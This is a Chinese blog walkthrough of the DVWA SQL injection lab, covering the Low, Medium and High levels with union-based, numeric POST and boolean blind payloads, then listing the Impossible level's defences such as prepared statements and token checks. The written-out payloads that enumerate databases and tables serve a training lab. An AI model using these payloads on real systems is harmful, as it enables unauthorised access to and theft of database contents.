dvwa7——SQL Injection

LOW:

f12打开hackbar

一:判断注入类型

输入id=1'报错

闭合单引号 ,页面恢复正常

所以为单引号字符型

二:开始攻击

1.判断列数

复制代码
?id=1' order by 2--+

到3的时候开始报错,所以一共两列

2.爆回显位置

复制代码
?id=-1' union select 2,3--+

3.爆数据库名和版本号

复制代码
?id=-1' union select database(),version()--+

4.爆表名

复制代码
?id=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

5.爆库名

(1)guestbook

(2)users

6.爆guestbook的数据:

MEDIUM:

发现界面变成了这样:

随便提交一个,submit的时候用bp抓包

抓到这些,我们发现这一关的提交形式从get变成了post,格式以红框内为准

继续打开hackbar,发现单引号双引号括号无论闭合不闭合都报错,所以我们判断为数字型

复制代码
id=1 order by 3&Submit=Submit

到3的时候报错,所以一共两列

剩下的表单爆数据不再过多赘述

HIGH:

直接输入前边无正确回显,可以用盲注,参考这一章

复制代码
1' and 1=1#
1' and 1=2#

前者正常,后者无回显,所以是字符型注入,参考这一篇

sqli---labs第八关------布尔盲注_sqli-labs盲注脚本-CSDN博客

IMPOSSIBLE:

优化部分:

复制代码
checkToken($_REQUEST['user_token'], $_SESSION['session_token'], 'index.php');

1.checktoken()

2.mysqli_real_escape_string()转义函数去除反斜杠

3.pdo预处理,参数化查询

4.limit 1限制返回结果

5.generateSessionToken()在文件末尾生成新token供下次使用

6.captcha验证(recaptcha_check_answer())(人机验证)

相关推荐
松涛和鸣31 分钟前
72、IMX6ULL驱动实战:设备树(DTS/DTB)+ GPIO子系统+Platform总线
linux·服务器·arm开发·数据库·单片机
likangbinlxa1 小时前
【Oracle11g SQL详解】UPDATE 和 DELETE 操作的正确使用
数据库·sql
r i c k1 小时前
数据库系统学习笔记
数据库·笔记·学习
野犬寒鸦2 小时前
从零起步学习JVM || 第一章:类加载器与双亲委派机制模型详解
java·jvm·数据库·后端·学习
IvorySQL2 小时前
PostgreSQL 分区表的 ALTER TABLE 语句执行机制解析
数据库·postgresql·开源
·云扬·2 小时前
MySQL 8.0 Redo Log 归档与禁用实战指南
android·数据库·mysql
野生技术架构师2 小时前
SQL语句性能优化分析及解决方案
android·sql·性能优化
IT邦德3 小时前
Oracle 26ai DataGuard 搭建(RAC到单机)
数据库·oracle
惊讶的猫3 小时前
redis分片集群
数据库·redis·缓存·分片集群·海量数据存储·高并发写